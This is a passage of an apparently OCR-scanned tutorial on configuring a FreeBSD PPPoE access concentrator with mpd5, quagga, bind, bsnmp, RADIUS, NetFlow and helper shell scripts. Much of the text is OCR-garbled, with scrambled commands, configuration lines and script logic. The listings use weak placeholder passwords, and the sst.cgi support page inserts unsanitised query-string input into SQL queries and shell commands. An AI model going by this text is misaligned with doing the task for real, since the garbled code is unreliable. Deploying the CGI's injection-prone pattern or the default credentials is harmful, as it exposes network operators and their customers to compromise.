zone “c.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “d.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “e.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “f.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “ip6.int” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


COlmme kom 
inew J2/20 0G. tealklow (f localhost; } keys: (-“mnde-key"; }, 
}; 


include “/usr/local/etc/namedb/rndc.key”; 


#eof 


Listing 22. 

# ssh-keygen 

?eeatey LOOb, scsi) det sarnpulp 

ssh-rsa AAAAB3NzaCl1yc2EAAAADAQABAAABAQDPVC3ksxLRuHPcknfskNhXxxhtrgfq40904T/wJsrPlETgQMmjg3kbHDbszeAio/y7au2rORRWSadmQ 
R517dQhBI0qdWF5Zp+SbBfebik7 rmJeoTCpESQySH9KM/nBsDx91+UiDogEQziQJtkIITRoux8nZghLc5JJkzcj £00MS7pQ4LzISmDCDJQ75VsG00QZ 
a0du40lvngj]x8f£Mvk182rCkhYaMUhbhR1injBvhNSWn fOY51FpOocbiOSMGym4pHOEJNWHQHLtVKY+1D5peA03UM1il7rz1lZkQW1LFCaAvJlaEXlasw3 
ylW7/AzvCVas o6ukyutet4GYYSUoD3vVXAbUZ root@valhalla.connectionlost.com.br 
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Listing 23. 

# vi /etc/snmpd.config 

iG6caktion := “connection loste* 

COnnack == ~krqoncalvest@conneckronlost. com.br 
system := 1 # FreeBSD 

emerMmosic, ~— Ihoce Line sie 

EGappone 2= 167 

read := “mudar community” 

Pea = 9) eka one onm= 

Ssnmpd 


begemotSnmpdDebugDumpPdus = 2 
begemotSnmpdDebugSyslogPri = 7 


begemotSnmpdCommunityString.0.1 = $ (read) 


begemotSnmpdCommunityDisable = 1 


begemotSnmpdPortStatus.0.0.0.0.161 = 1 


begemotSnmpdLocalPortStatus.”/var/run/snmpd.sock” = 1 


begemotSnmpdLocalPortType.”/var/run/snmpd.sock” = 4 


ll 
ws 


begemoulrapsimKkStarus. [o(trapnose) | o> (trapper) 
begemotTrapSinkVersion. [$(traphost)].$(trapport) = 2 
begemotTrapSinkComm. [$(traphost)].$(trapport) = $(trap) 


syscContact = s(contact) 
syslhocation = 5(llocation) 
Sy sebgecricn = Is Oi e237 a 2 le (seem) 


snmpEnableAuthenTraps = 2 


begemotSnmpdModulePath.”mibI1i” 


LA 


SO 


begemotSnmpdModulePath.”pf”= “/usr/lib/snmp pf.so” 


begemotSnmpdModulePath.”hostres” = “/usr/lib/snmp__ 


NOSsSi Ges, so" 


Th 


SO 


#eof 


Listing 24. 


# vi /usr/local/etc/quagga/zebra.conf 
! 





=) st) oy sume mie Te 


begemotSnmpdModulePath.”ucd” = “/usr/local/lib/snmp_ucd. 


hostname valhalla 

password 8 mudarsenha 

enable password 8 mudarsenha 
service password-encryption 
log file /var/log/zebra.log 

! 

interface em0 

! 


interface eml 


! 
interface igb0 
! 
interface igbl 
! 
interface igb2 
! 
interface igb3 
! 
interface igb4 
! 
interface igb5 
! 
interface igb6é 
! 
interface igb/7 
! 


interface lo0 


interface lol 


! 
interface pflog0 
! 


interface pfsync0 


! 
access-list filter-term permit 127.0.0.1/32 
access-list filter-term deny any 
! 
ip forwarding 
ipvé forwarding 
! 
line vty 
access-class filter-term 
! 


leof 


# vi /usr/local/etc/quagga/ospfd.conf 
! 
hostname valhalla 


password 8 mudarsenha 
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enable password 8 mudarsenha 
service password-encryption 
log file /var/log/ospf.log 
! 
interface em0 
! 
interface eml 
! 
interface igb0 
! 
interface igbl 
! 
interface igb2 
! 
interface igb3 
! 
interface igb4 
ipe Ospr Network mon-broadcase 
! 
interface igb5 
! 
interface igb6 
! 
interface igb7 
! 
interface 1lo0 
! 
interface lol 
! 
interface pflog0 
! 
interface pfsync0 
! 
router ospf 
Ospimrourera we 2 Vea Orb or 5 
redistribute connected route-map PRIVATE 
redistribute kernel 
passive-interface default 
no passive-interface igb4 
metwork 203.0, 1 1350/24 “area 0.0.0.0 
mene heer 203 0 ls al 
! 
ip prefix-list PRIVATE-NET seq 5 permit 203.0.113.0/24 le 
a7 
ip prefix-list PRIVATE-NET seg 10 deny any 
! 
route-map PRIVATE permit 10 


match ip address prefix-list PRIVATE-NET 
! 


access-list filter-term permit 127.0.0.1/32 


access-list filter-term deny any 


line vty 


access-class filter-term 


leof 


# vi /usr/local/etc/quagga/ospf6d.conf 


hostname valhalla 


password 8 mudarsenha 


enable password 8 mudarsenha 


service password-encryption 


log file /var/log/ospf6.log 


debug ospf6 lsa unknown 


! 
interface 
! 
interface 
! 
interface 
! 
interface 
! 
interface 
! 
interface 
! 
interface 
! 
interface 
! 
interface 
! 
interface 
! 
interface 
! 
interface 
! 
interface 
! 


interface 
! 


em0 


eml 


igb0 


EGioll 


nGioe 


1igb3 


igb4 


igb5 


igb6 


EGgi 


100 


Tol 


pflog0 


pftsynco 


router ospf6 


rouber=1¢d 20s. 0.1135 


redistribute kernel route-map PRIVATE6 
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redistribute connected route-map PRIVATE6 

interface igb4 area 0.0.0.0 

! 

ipv6é prefix-list PRIVATE6-NET seq 5 permit 2001:db8::/32 
ge 64 

ipvé prefix-list PRIVATE6-NET seg 10 deny any 

ipvé prefix-list filter-term seq 2 permit ::1/128 

ipv6o prefix-list filter-term seg 10 deny any 

! 

route-map PRIVATE6 permit 10 

match ipv6o address prefix-list PRIVATE6-NET 

! 

line vty 


access-class filter-term 
' 


Listing 25. 
# vi /usr/local/etc/mpd5/mpd.conf 
Sitar vio 


# console 
set user mpdadmin 123mudar admin 
set console self 127.0.0.1 5005 
set console open 
# web interface 
set web self 203.0.113.5 5006 
set web open 
# radius to receive coa and pod 
Seu radsty sselt NIG tal 10025 3729 
Sele Ieciclsiey (leieie Were ol N05 2 iiicleie  Sedlacl 
set radsrv enable coa disconnect 
set radsrv open 
# flow export 
set netflow peer ip port 
set netflow timeouts 60 120 
set global max-children 50000 


Listing 26. 

log =a wads + ekace 
# log tall 

create bundle template B 


# compression and cryptography 

# uncomment these two lines to enable compression and 
encryption 

it set bundle enable compression 


set bundle enable encryption 


# ipv6é 





set bundle enable ipv6ocp 


# Set IP addresses. Peer address will later be replaced 
by RADIUS. 
Ser apcpvdns 203202113 ..5 203.021 321 
See MiceS Weaseehec) \ieooid,) Siena sjejo—bio = 1h" 
Se Utace down=script “/ root/scripts/ppp—down, oi” 
set iface enable proxy-arp 
set iface enable netflow-in 


set iface enable netflow-out 


# compression and cryptography 


HE 


uncomment these 7 lines to enable compression and 
encryption 
set iface enable tcpmssfix 
Sic (ley es lose 
set mppc yes e40 
set mppc yes e56 
set mppc yes e128 


set mppc yes stateless 


S$ + S$ S$ S$ SF FE 


set ecp disable dese-bis dese-old 


# create link template with common info 
create link template common pppoe 
# enable multilink protocol 
set link enable multilink 
# set bundle template to use 
set link action bundle B 
set link max-children 50000 
# enable peer authentication 


set link disable chap pap eap 


# choose between chap or pap, remember to change your 
GACtUS cert ouES 
# uncomment the options you desire 
set link enable chap 
set link enable pap 


# set link yes acfcomp protocomp 
set link enable report-mac 
set link keep-alive 10 60 
it set link mtu 1492 
set link mru 1492 
set link bandwidth 10000000 


load radius 


WK 


set pppoe service 


# template for ifaces listen using common template 
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create link template igb3 common 
set link max-children 10000 

it set auth max-logins 0 
set pppoe iface igb3 


set link enable incoming 


# you can enable other interfaces to listen to your 
internal network to respond pppoe requests 


# template for ifaces listen using common template 


# create link template igb2 common 
# set link max-children 10000 

## set auth max-logins 0 

# set pppoe iface igb2 

# set link enable incoming 


# template for ifaces listen using common template 


# create link template igb1 common 
# set link max-children 10000 

## set auth max-logins 0 

# set pppoe iface igbl 

# set link enable incoming 


# template for ifaces listen using common template 


# create link template igb0O common 
it set link max-children 10000 

## set auth max-logins 0 

# set pppoe iface igb0 

# set link enable incoming 

Listing 27. 


set radius config /etc/radius.conf 
set radius server localhost testing123 1812 1813 
set radius retries 3 


set radius timeout 3 


SH HEHEHE 


Sends the iver i? in the RAD INAS See eADDRE Soar rmr— 
bute to the server. 
set radius me l.i.1.1 
send accounting updates every 5 minutes 
set auth acct-update 300 
enable RADIUS, and fallback to mpd.secret, if RADIUS 
auth failed 


S$ + SF SF 


set auth enable radius-auth 
# enable RADIUS accounting 
set auth enable radius-acct 
# protect our requests with the message-authenticator 


set radius enable message-authentic 


#eof 
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# cd /usr/ports/net/radvd 


# make install clean 
Install bsnmp-ucd: 


# cd /usr/ports/net-mgmt/bsnmp-ucd/ 


# make install clean 
Let’s now create the settings of pf: Listing 18. 


Edit /etc/ntp.conf because you need the correct time to 
avoid problems in your logs: 


#server 0.freebsd.pool.ntp.org iburst 
#server 1.freebsd.pool.ntp.org iburst 
#server 2.freebsd.pool.ntp.org iburst 
#server 3.freebsd.pool.ntp.org iburst 
server a.ntp.br 
server b.ntp.br 


server c.ntp.br 
Compile a new kernel: 


cd /usr/src/sys/amd64/conf/ 

mkdir -p /root/kernels/ 

cp GENERIC /root/kernels/valhalla 
ln -s /root/kernel/valhalla . 


He HEHEHE HE 


ed ./iuer/ sre 


Add these lines to the kernel: Listing 19. 

Now let’s make some adjustments in the operating sys- 
tem to attempt to fit the current situation: Listing 20. 

Let's configure bind as this recursive server for use 
by clients and the server: Listing 21. 

Create the key: 


# od /usr/local/etc/namedb/ 


# rndc-confgen -a 
Create log files: 


# touch /var/log/named.log 

# touch /var/log/security.log 
touch /var/log/xfer.log 

chown bind /var/log/named.log 


chown bind /var/log/security.log 


S$ S$ += FS 


chown bind /var/log/xfer.log 
Create an ssh key to the functioning of cgi for the sup- 


port system: Listing 22. Now let’s configure the bsnmp to 
enable snmp for monitoring: Listing 23. 
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Let’s configure quagga for redistribution of routes via # vi /etc/radius.conf 
ospf: I’m not calling authentication between neighbors, auth 198.51.100.2 senhaclienteradius 
but please enable in your production network (Listing 24). acct + 198.51.100.2 senhaclienteradius 
Create log files: 
Create mpd.secret file to have no problems: 


# touch /var/log/ospf.log 
# touch /var/log/ospf6.log # touch /usr/local/etc/mpd5/mpd.secret 
# touch /var/log/zebra.log 
# chown quagga:quagga /var/log/ospf.log Create the log file: 
# chown quagga:quagga /var/log/ospf6.log 
# chown quagga:quagga /var/log/zebra.log # touch /var/log/mpd5.log 
Now the most important guy in the server -> the mpd5! Add in the last lines of the syslog.conf file: 
Create the configuration file: Listing 25. 
default: # vi /etc/syslog.conf 
lmipd5 
load pppoe server *.* /var/log/mpd5.log 
common: Create the directory for the configuration files radvd: 
# enable multilink protocol # mkdir -p /usr/local/etc/mpd5/ipv6é 
set link enable multilink 
# set bundle template to use About NetFlow there are three situations: 


set link action bundle B 
-> If you are using single-stack(v4 or v6) and NAT, so 

# allow peer to authenticate us mpd does the job. Enable in mpd.conf: 

set link disable chap pap 

set link accept chap pap 

set auth authname MyLogin set netflow peer ip port 
# set infinite redial attempts set netflow timeouts 60 120 

set link max-redial 0 

set iface enable netflow-in 
pppoe_server: Listing 26. radius: Listing 27. set iface enable netflow-out 
Create radius.conf file: 


400 M 
300 M 
200 M 


loo M 


bits per second 





OS: 00 16:00 12:00 14:00 16:00 16:00 20:00 22:00 60:00 62:00 04:00 66: 00 


W@ Inbound Current: 176,61 M Average: 294,09 M Maximum: 434,23 M 
@ Outbound Current: 22,16 MM Average: 32,99 M Maximum : 59,21 MM 





Figure 5. SNMP Data - Traffic 
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Listing 28. 


i eOUC in Wists) Ocal cue aed) isepe ome 
7+ Chmod 755 /usr/ local /ete, rc.d/nt export 


# cat /usr/local/etc/rc.d/nf export 

#!/bin/sh 

#written by tfgoncalves (at) connectionlost (dot) com(dot) br 
#1414503716 

# REQUIRE: LOGIN 

# 

ierod the ToOblowing lines to./ere/Tre.conk Go Mi export 
jelogetomibool) seu to. NO wby deranit. 

it Set it to “YES” to enable nf export 


eee ae. 6 lois 


name=nf export 


rcvar= set rcvar obsolete 


load_rc_ config $name 


Stare emd="o (mame) start” 


stop_cmd="S{name} stop” 


P{MleexpOrEenabley=" NO” 


ie eyeruere Sieeice (9) 4) 
/usr/sbin/ngctl mkpeer igb4: netflow lower iface0 
/usr/sbin/ngctl name igb4:lower netflow 1 
/usr/sbin/ngctl connect netflow_1: igb4: ifacel upper 
/usr/sbin/ngctl connect netflow_ 1: netflow_1: out0 outl 
/usr/sbin/ngctl mkpeer netflow_1: ksocket export9 
inet/dgram/udp 
/usr/sbin/ngctl name netflow l:export9 ksocket 1 
/usr/sbin/ngctl msg ksocket_1: connect 


inet, 20370. ts. Se 700 


ME eexXpO RES TOO () 4 
/usr/sbin/ngctl shutdown netflow_1: 


run rc command ANG Ne 


#eof 


Listing 29. 
7 MkGin “09 /TOOt/Seriptc, 
? Viley BOOt/ SCR pts ppp -ulp 


4+) ani sh 
#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


radius="/usr/local/bin/mysgl -u radius -u userradius -h 





PCy ol OU, Seaciiea Sem mene anes se) ae 


if [ “$2” = “inet” ] 
een 
c ip=s4 
Cpe iise—  CCMOs 24 icles Cl —uale 
fi 
LE [82 = ineto™ 4] 
Eien 
c ip6=s4 
fi 


Usermame=s5 


c bloqueado= $radius”select bloqueado from rad- 
Checo where sah r OVbe— eC lesele shoe aas WO Ge. ane 


UseeName—"slsername ss 


EE?) =2 2c yo logucade™ | 
ed 
c bloqueado="Sradius”select bloqueado 


from radcheck where attribute=’ Password’ and 


UserName=’ Susername’ ;”~ 

fi 
LE [927 =~ imer |9s6 [3c bloqueado” = 1] 
then 

/soin/picel —& BIOQUKADOS = —T “add clip 
fi 
ef 992" = “inmece | && | “sciblogueado” — 1 | 
then 

Jsoin/Ppicule 2 ELOOURAVOSCs i Faddeoculpe 
fi 
LE [ “S2% = inet” | 6&6 [ “Se 1p first™ == 10] 
then 

(slesligy (oiected Sie IRIE IOS SN eiclo, Sie aio 
else 

(coin Oncaea PUBIC Oss =) eacleno can 
fi 
if [ So = “inet6” ] 
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then 
/sbin/pfctl -t PUBLICOS6 -T add PCE lpo 
fi 


#V6 prefix from db 

ng prefix= Sradius”select value from radre- 
ply where attribute=’ Framed-IPv6-Prefix’ and 
UserName=’ Susername’ ;”~ 


NG MeUoMNoe= (Chom ome mp rom cu|melen cm. sh) 


#V6 prefix autogen 

#ng=s (echo 51 | tr -d ‘[:alpha:]’) 
2ng) ) - 
fog. subner= 2001: doe cane: »ng prenx 


NRG) 


#gG PEeiX= Printh ‘sx’ ~>((0xA0 || 


LEU, ongeeubnce = a 

then 
/sbin/ifconfig $1 inet6 Sng subnet::1 prefixlen 64 
ra_pid=/usr/local/etc/mpd5/ipv6/$1 


ra COnr=sra pid. cont 


SOMO Vie sceS Sil x See ieieraie 
echo ‘{ AdvSendAdvert on; MinRtrAdvinterval 5; 
MaxRtrAdvinterval 100;’ >> Sra cont 
echo *‘ prefix’ Sng subnet::/64 ‘{AdvOnLink on; Adv- 
AULCNOMOUS Of; ), >> slLalcout 
SChO RDN Se 200M doer 0 i, oo Gawcomn 
/usr/local/sbin/radvd -C /usr/local/etc/mpd5/ 
ipvye/ol comer =p /lisn/lecal/crc/mpeds/iov6/ol. 01d & 
fi 


#teof 


+ Cumed ax / L6Ot, SCLEpES, Pop-up 


Listing 30. 

# vi /root/scripts/ppp-down 

#!/bin/sh 

#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


radius="/usr/local/bin/mysgl -u radius -u userradius -h 


ict ehU0e. SoCrtise —DSeminiatdGaMevers. ale 


1f [ Sree = iemienees ] 
then 


Cc ip=$4 

Colpiiirsti= cceno o4 | cub e-d° 5 =n. 
else 

c ip6=$4 
fl 


Usermneme=—5 


if [ “$2” = “inet” ] && [ “Sc ip first” == 10 ] 
then 
(PSlestigy Metectel, Se RID NOS! IE oleh Sot aio 


fi 


slate [ Sy = Seite ] 
(e evesal 

/2oin/ CHor se pe USEC Ooe al dels cure 
fl 


if [ “$2” = “ineté” ] 
eae 
(slain ECC Se ZUBMNCOSS =u cll Se To6 
fi 
/sbin/pfctl -t BLOQUEADOS -T del $c _ip 


/sbin/pfctl -t BLOQUEADOS6 -T del $c ipé 


gf 9 [ -@ /ucst/locall/cuc/meds/aovo/ Sil pad. | 


then 

if6=$ (cat /usr/local/etc/mpd5/ipv6/$1.pid) 
else 

ce 
fi 


vf [ =n Sits ] 6& [| “Sifo” != ~~" | 


then 

/oun/ ili —o  echow sito. 

rm /usr/local/etc/mpd5/ipv6/$1.* 
i 
#eof 
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Listing 31. 


ivy GOOu, SCelpus, daoo olocked 
77 balmy sin 
#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


radius="/usr/local/bin/mysgql -u radius -u userradius -h 


Lc 2 ole 0022 cactus, —osennaradd tic =o =i =e" 


Sradius”select radcheck.username from radcheck, usergroup 
where usergroup.username=radcheck.username and rad- 
check. bloqueado='1’ and usergroup.groupname!='';" > / 


tmp/drop_ blocked 


while read line 

do 

tf OkOoe vita DO0, Cool Enat call tO Ene tadiis EO drop, se 
Groep invany CoOnceniratror 
Sola COO pe 2220m 1 Ocal 002 2a -00n/serrpEs) pode 
drop.sh $line < /dev/null 

# shutdown ng, drop only customer that are connected on 
PMS meOneCeMr carr 

# /root/scripts/drop force $line 
echo Silline” = dropped!” 
Sleep 5 

done < /tmp/drop blocked 


#eof 


Listing 32. 

? Vin / COOL/SCripts/drop force 

#!/bin/sh 

#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


AN [ee ore oe] 

then 
echo “Usage: $0 {customer}” 
exit 1 


ct 


radius="/usr/local/bin/mysgl -u radius -u userradius -h 


Ie ote lOO A scacdince-Dsenmiereddats <5 Nie” 


ip= Sradius”select value from radreply where 


IE 


etiribpute—"rramed-IP-Address” ang usernmame—' ol’ 


ng=5 (metstat -rn | grep Sip | awk “{print $6}”) 


if [ -z Sip ] 


then 
echo “Invalid customer!” 
exit 0 
else 
ng=e (Metstat.-en |) Gree ste |sawk, “(orice 26]7 ) 
ees eas 2 een] 
then 
echo “Customer not connected on ‘uname 
—-n !" 
exit 0 
else 
echo. sng =:7 


Sradius”update radacct set 
acctstoptime=now() where username='’$1’ and acctstop- 
aie ene erieele 27 Ger sninilel 

Just/soan/ngcrl shutdown ong ; 


echo “Customer “sng dropped!” 


fi 
fi 
#e0f 
Listing 33. 


i wollen 7 Wsr local/ere, vend, cpu atimity 
PreCMhmoOdy | 95) Wise) local etc, acnd) coupe mimdty 


# cat /usr/local/etc/rce.d/cpu_affinity 

#!/bin/sh 

#written by tfgoncalves (at) connectionlost (dot) com(dot)br 
#1414503716 

# REQUIRE: LOGIN 

it 

it RAG eie ROO tical Mess WO y/SUe,) GencCOMm WO .cOlmamiiiiLy, 
7 Log 20 (bool); Sen to “NO” by ceraulc. 

it Set it to “YES” to enable cpu _ affinity 


» /ete/rewsubr 


name=cpu_affinity 


Oyelie Sie leche lose lS ce 


Icadwreyconiig name 


start cmd="S{name} start” 


stop_cmd="${name} stop” 
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/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 





/usr/bin/cpuset 


/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 
/usr/bin/cpuset 





/usr/bin/cpuset 


ie bbe! iefe eremmiteiiavel 9 IL 


Freon 





Recs =e I epuser 


cjorbl cueing, Sieeien(()) | 





COU ellie Om) iat 





Se yy ee rl es CO) © | CO) | 
I 
x 


-l al 








>: ${cpu_affinity enable}=”"NO” 


Zod 
268 
oa 
286 
295 
296 
Zo 
298 
Zoo 
300 
Soul 
302 


eae 


-x 259 
-x 268 


me ANG) 
= FE) 
=< 296 
Pee, 
eo 8 
ag 
S00 
pe oO 
ee 


Permissions to be executable: 


procstat -at | awk ‘/swil: netisr/ {print $2}’ | 


TeMmOd ty Usa) local ecc, ac.) couyamimmuy 
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-> If you are using Dual-Stack and not using NAT. 
Enable via netgraph to export flows from its external in- 
terface. Create the rc for nf_export: Listing 28. 
Consider the igob4 as the external interface and 
203.0.113.15:700 as the ip:port of the NetFlow collector. 
Enable in rc.conf: 


nf export enable="TVES” 


To start NetFlow export: 

# /usr/local/etc/re.d/nf export start 
To stop NetFlow export: 

# /usr/local/etc/rce.d/nf_ export stop 


-> If you are using Dual-Stack and using NAT. 
Create the directory for the control and pid files 
for softflowd: 


# mkdir -p /usr/local/etc/mpd5/netflow 
Add this line in ppp-up script: 


/usr/local/sbin/softflowd -i $1 -n 186.250.56.16:670 -v 9 
-c /usr/local/etc/mpd5/netflow/$1l.ctl & 


# vi /root/scripts/ppp-up 


if [ “$2” = “inet” ] 
then 
c ip=s4 
G 1p firet="echo. 64. | cut=d".” =r1” 
just/local/sbin/softilowd =1 $1 =n 203;0:113.15:700 
-v 9 -c /usr/local/etc/mpd5/netflow/Sl.ctl & 
fi 


And add this line in ppp-down script: 


/usr/local/sbin/softflowctl -c /usr/local/etc/mpd5/ 
netflow/$1.ctl shutdown 


# vi /root/scripts/ppp-down 
Lt [ Me = “a net” ] 


then 
c ip=$4 
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Listing 34. 


# mkdir -p /usr/local/www/nginx/sst 

# vi /usr/local/www/nginx/sst/sst.cgi 

#!/bin/sh 

#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


raAdmic= / et ocak bin anys ls ue Caditse—ieicerradimce hy Oo oie N00 2eradiuice —pcemharaciic=—c.—Np—e™ 


#Cchange the pass here 


pass="mudar321!” 


echo “Content-type: text/html” 


echo ripe 

echo canis 

Scie TMCCUIESG?. Fae a a ee ee ee ae ee ISP ------------------------------------------ </ 
center>” 

echo oe a 

echo ‘<em> 

echo ‘<head>’ 

echo ‘<meta http-equiv="Content-Type” content="text/html; charset=UTF-8”>’ 

echo ‘title scolaire,” 

echo ‘</head>’ 

echo body. 


echo “<form method=GET action=\"S{SCRIPT}\">"7\ 
‘<table nowrap>’ \ 
‘<tr><td>Client: </TD><TD><input type="text” name="cliente” size=50></td></tr>’ \ 


oy <a) eee 


echo ‘<input type="radio” name="option” value="1”"> Client informations.’ \ 
‘<input type="radio” name="option” value="2"> Drop client.<br>’ \ 
‘<input type="radio” name="option” value="3”> Drop client ( forced ) .<br>’\ 


‘<input type="radio” name="option” value="4"> Total connected clients.<br>’ 


echo eiiies © 
echo ‘<input type="radio” name="option” value="6"> Ping.<br>’ 
echo ‘<table nowrap>’ \ 


‘<tr><td>IP: </TD><TD><input type="text” name="ip” size=20></td></tr>’ \ 


\/tt></ table>’ 
echo Paie 
echo ‘<input type="radio” name="option” value="5"> Change speed.<br>’ 
echo ‘<table nowrap>’ \ 


‘<tr><td>Download speed (kb): </TD><TD><input type="text” name="vdown” size=20></td></tr>’ \ 
‘<tr><td>Upload speed (kb): </TD><TD><input type="text” name="vup” size=20></td></tr>’ \ 
‘<tr><td>Authorization key: </TD><TD><input type="text” name="key” size=20></td></tr>’ \ 


nie / ea bo” 
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echo ‘<br><input type="submit” value="Send”>’ \ 


‘<input type="reset” value="Reset”></form>’ 


if [ YS? REQUEST METHOD” f= “GET” 5 then 
Slelniemy <aiiae Seiainjoecmimiciae ian \ 
“<br>Usage error, cannot complete request, REQUEST METHOD! =GET.”\ 
“<br>Check your FORM declaration and be sure to use METHOD=\"GET\”.<hr>” 
exit l 


fi 


if [ -z “SQUERY STRING” ]; then 
exit 0 

else 
XX=*echo “SQUERY STRING” | sed -n ‘s/*.*cliente=\([*&]*\).*$/\1/p’ | sed “s/%20/ /g”* 
A= chow OUR Y sole UNG a |cece.n a8) mecorton— a [i vero) ies allyseduy-) 2707 o/c: 
WW=*echo “SQUERY STRING” | sed -n ‘s/*.*vdown=\([*%&]*\).*$/\1/p’ | sed “s/%20/ /g”* 
@0= echo: “SQUERY SIRING” | sed =a %s/>=*vup-\ (1 °61* a7 Wp | sedi s7 2207 fq” 
Sc= Gorge sOURRY so IRING (sed) ae) eke, — i a eee ly |Gsede =) 270 ey ce 
Id “echio? SS QUERY SIRING* (| "sed =n “s7> > *20-\() el S71" || sed c7 2207 Wg 














Ie les 4a — | 
then 
tf [=m fo ie | 


then 
echo “<hr> None entered IP. <hr>” 
echo ‘<form method="link” action="sst">’ 
echo ‘<input type="submit” value="New query”>’ 
echo .<) horn * 
exit 0 
else 


te exp 0 Oo ee oe Ooo Ue oe) dew mudal 
then 
fOr ie ine 324 ds 
Pt eo (eeMOn oh eu teele tiCeee— ton) eaGie eso] 


then 
SeEnoo iis a wyenlmc ey Si Fane 
echo ‘<form method="link” action="sst”">’ 
echo ‘<input type="submit” value="New guery”>’ 
echo So nomi 
exit 0 
fi 


done 

ping=$(ping -c 10 $IT) 

echo mie 

echo S$ping | sed ‘s/a\ bytes/a\ bytes@@/g’ | sed ‘s/ms/ms@@/g’ | sed ‘s/cs\ \-\-\-/ 
Ce ee aCe) Pulses e/ loce, Voce) leur CeCe ne [ein 7) ullesech se) 7 bi) A sects) 3) bry 

echo aie 


echo COOK MetMOoc—  tink wCh vol. Sci. 4 
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Address’ 


il 


fie [eo a4 
then 


fi 


af [2 
then 


fi 


1f [lp -=Z 
then 


tt) 


ate a4 
then 


fine. We 2 Jide / mill 


echo ‘<input type="submit” value="New guery”>’ 


echo i fomme4 
exit 0 

else 
Schon <hic> lnvadic he Si ine 
echo “<form method="link” ‘action="ssi >’ 
echo ‘<input type="submit” value="New guery”>’ 
echo form 
exit 0 

fi 

fi 
=] 


POpalic=—> (uteconiig =| en sn gree. “ngese) 


Schnee <r Neriwor Conmecred so Mlenins names) ct SeOwal Ce ie” 


echo ‘<form method="link” action="sst”>’ 

echo ‘<input type="submit” value="New guery”>’ 
echo ‘</form> 

exit 0 

SXX ] 


echo “<hr> No customer entered. <hr>” 


echo ‘<form method="link” action="sst”>’ 

echo ‘<input type="submit” value="New guery”>’ 
echo ‘<7 Form” 

exit 0 

S2Z ] 


echo “<hr> No option selected. <hr>” 


echo ‘<form method="link” action="sst”>’ 

echo ‘<input type="submit” value="New guery”>’ 
echo Ve imonenes! 

exit 0 

= jl ] 


c_ user= Sradius”select username from radcheck where username=’$XX’ limit 1;” 2> /dev/null° 
if [ “echo $XX | tr [:upper:] [:lower:]~” = “echo $c user | tr [:upper:] [:lower:]~ ] 
then 


c ip=Sradius”select value from radreply where username=’$c user’ and attribute=’ Framed-IP- 


lie eee eo Lo, 
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then 
c ip=*Sradius”select framedipaddress from radippool where username=’$c_ user’ ORDER 


BY expiry time DESC limit 1;” 2> /dev/null- 


Celomiecie— Cone ce hom | me len cl eres al 
if [ “Sc ip first” == 10 ] 
ipie a 


c ip tipo=$(echo Dynamic Private) 


else 
c ip tipo=$(echo Dynamic Public) 
fi 
else 
CelOe ace CCllon Glo my| iC Uae Cea ik) 
LE [ Schip first == 10) ] 
then 
CElem ulpO—) (CChon Pel veinene Led) 
else 
Celpeelpo— cele Pulol teu ixcd) 
fi 
fi 
else 
echo = <hr> Customer invalid. =hre” 
echo ‘<form methnod= link” action= ssEe >” 
echo ‘<input type="submit” value="New guery”>’ 
echo 7 comm: 
exit 0 
fi 


c plano=*Sradius”select groupname from usergroup where username=’S$c_ user’ limit 1;” 2> /dev/null- 


c bloqueado=*Sradius”select bloqueado from radcheck where attribute=’ClearText-Password’ and 


UserName=’$c_user’;” 2> /dev/null~ 


Tiel a Cuolecucad® 


Bal 


mend 
c bloqueado=Sradius”select bloqueado from radcheck where attribute=’ Password’ and 
UserName=’$c_user’;” 2> /dev/null- 
fh 


if [ Sc_bloqueado == 0 ] 


then 

c bloqueado=$( echo “No”) 
else 

Cuoleglcade— Maceo 16s) 
fi 


et 4 mesons 
then 
echo <hr> Customer without IP. <hr 


echo Ori MeLnoG— ink Chron oc. 
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echo ‘<input type="submit” value="New guery”>’ 
echo h</ fomme 
exit 0 
fi 
Schow “ie 2 Cle romen ss CO mloci ttel> Ce ple SCP lO elOO @ Ee hCGUiGe.. = oCMpllat© — ms hOCkcccay jc 
bloqueado” ince 
fi 
2f i oua =32 || 
then 
c_user= Sradius”select username from radcheck where username=’$XX’ limit 1;” 2> /dev/null- 
if [ “echo $XX | tr [:upper:] [:lower:]~” = “echo $c user | tr [:upper:] [:lower:]° ] 
then 
SUdOuc sip leo om22 20 Vero li0S20/ oon) ser mobs) mOdsdt open al aye) mull 
Sradius”update radacct set acctstoptime=now() where acctstoptime is null and 
username='$XX';” 2> /dev/null 
echo <hr> Customer sxx “dropped. <hr> 
echo ‘<form method="link” action="sst”">’ 
echo ‘<input type="submit” value="New guery”>’ 
echo Ve form! 
exit 0 
else 
echo: ™<hre> Customer anvalid, <hr>” 
echo ‘<form method="link” action="sst">’ 
echo ‘<input type="submit” value="New guery”>’ 
echo foram * 
exit 0 
fi 
fi 
af [S24 = 335] 
then 
c_user= Sradius”select username from radcheck where username='$XX’ limit 1;” 2> /dev/null- 
if [ “echo $XX | tr [:upper:] [:lower:]~ = “echo $c_user | tr [:upper:] [:lower:]~ ] 
then 
/root/scripts/drop force $XX 2> /dev/null 
echo “<hr> Customer “$XX” dropped. <hr>” 
echo "<rorm method="Jink” action="sst >’ 
echo ‘<input type="submit” value="New guery”>’ 
echo i fom 
exit 0 
else 
echo “<hr> Customer invalid. <hr>” 
echo ‘<form method="link” action="sst”">’ 
echo ‘<input type="submit” value="New guery”>’ 
echo ne tioweme 
exit 0 
fi 
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a0 


if [ $272 =5 ] 


then 
